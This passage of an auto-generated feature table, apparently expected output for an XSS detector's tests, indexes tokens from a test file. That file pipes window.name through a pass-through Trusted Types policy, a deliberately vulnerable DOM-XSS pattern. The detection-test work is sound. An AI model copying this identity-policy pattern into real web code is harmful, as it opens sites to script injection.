createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:66 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | 'arguments' object of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | 'arguments' object of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | 'arguments' object of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | 'arguments' object of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | 'arguments' object of method createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | exceptional return of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | exceptional return of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | exceptional return of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | exceptional return of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | exceptional return of method createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | return of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | return of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | return of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | return of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | return of method createHTML | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | x => x | CalleeFlexibleAccessPath | trustedTypes.createPolicy | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | x => x | InputAccessPathFromCallee | 1.createHTML | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | x => x | InputArgumentIndex | 1 | @@ -15668,6 +110821,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | x => x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | x => x | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:2:66:2:71 | x => x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:71:2:71 | x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:71:2:71 | x | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:71:2:71 | x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:71:2:71 | x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:2:71:2:71 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:11 | policy1 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:11 | policy1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:11 | policy1 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:11 | policy1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:11 | policy1 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:22 | policy1.createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:22 | policy1.createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:22 | policy1.createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:22 | policy1.createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:22 | policy1.createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | exceptional return of policy1 ... w.name) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | exceptional return of policy1 ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | exceptional return of policy1 ... w.name) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | exceptional return of policy1 ... w.name) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | exceptional return of policy1 ... w.name) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | policy1 ... w.name) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | policy1 ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | policy1 ... w.name) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | policy1 ... w.name) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:5:3:35 | policy1 ... w.name) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:13:3:22 | createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:13:3:22 | createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:13:3:22 | createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:13:3:22 | createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:13:3:22 | createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:29 | window | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:29 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:29 | window | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:29 | window | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:29 | window | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:34 | window.name | CalleeFlexibleAccessPath | policy1.createHTML | | autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:34 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:34 | window.name | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | @@ -15676,6 +110864,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:34 | window.name | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:34 | window.name | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:3:24:3:34 | window.name | receiverName | policy1 | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:31:3:34 | name | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:31:3:34 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:31:3:34 | name | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:31:3:34 | name | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:3:31:3:34 | name | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:17 | policy2 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:17 | policy2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:17 | policy2 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:17 | policy2 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:17 | policy2 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 ... afe' }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 ... afe' }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 ... afe' }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 ... afe' }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:11:5:79 | policy2 ... afe' }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:32 | trustedTypes | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:32 | trustedTypes | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:32 | trustedTypes | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:32 | trustedTypes | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:32 | trustedTypes | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:45 | trusted ... ePolicy | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:45 | trusted ... ePolicy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:45 | trusted ... ePolicy | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:45 | trusted ... ePolicy | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:45 | trusted ... ePolicy | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | exceptional return of trusted ... afe' }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | exceptional return of trusted ... afe' }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | exceptional return of trusted ... afe' }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | exceptional return of trusted ... afe' }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | exceptional return of trusted ... afe' }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | trusted ... afe' }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | trusted ... afe' }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | trusted ... afe' }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | trusted ... afe' }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:21:5:79 | trusted ... afe' }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:34:5:45 | createPolicy | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:34:5:45 | createPolicy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:34:5:45 | createPolicy | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:34:5:45 | createPolicy | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:34:5:45 | createPolicy | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:47:5:49 | 'x' | CalleeFlexibleAccessPath | trustedTypes.createPolicy | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:47:5:49 | 'x' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:47:5:49 | 'x' | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | @@ -15692,6 +110925,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:5:52:5:78 | { creat ... safe' } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:52:5:78 | { creat ... safe' } | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:52:5:78 | { creat ... safe' } | receiverName | trustedTypes | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:63 | createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:63 | createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:63 | createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:63 | createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:63 | createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:54:5:76 | createH ... 'safe' | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:66 | x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:66 | x | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:66 | x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:66 | x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:66 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | 'arguments' object of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | 'arguments' object of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | 'arguments' object of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | 'arguments' object of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | 'arguments' object of method createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | exceptional return of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | exceptional return of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | exceptional return of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | exceptional return of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | exceptional return of method createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | return of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | return of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | return of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | return of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | return of method createHTML | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | x => 'safe' | CalleeFlexibleAccessPath | trustedTypes.createPolicy | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | x => 'safe' | InputAccessPathFromCallee | 1.createHTML | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | x => 'safe' | InputArgumentIndex | 1 | @@ -15701,6 +110969,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | x => 'safe' | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | x => 'safe' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:5:66:5:76 | x => 'safe' | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:71:5:76 | 'safe' | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:71:5:76 | 'safe' | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:71:5:76 | 'safe' | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:71:5:76 | 'safe' | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:5:71:5:76 | 'safe' | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:11 | policy2 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:11 | policy2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:11 | policy2 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:11 | policy2 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:11 | policy2 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:22 | policy2.createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:22 | policy2.createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:22 | policy2.createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:22 | policy2.createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:22 | policy2.createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | exceptional return of policy2 ... w.name) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | exceptional return of policy2 ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | exceptional return of policy2 ... w.name) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | exceptional return of policy2 ... w.name) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | exceptional return of policy2 ... w.name) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | policy2 ... w.name) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | policy2 ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | policy2 ... w.name) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | policy2 ... w.name) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:5:6:35 | policy2 ... w.name) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:13:6:22 | createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:13:6:22 | createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:13:6:22 | createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 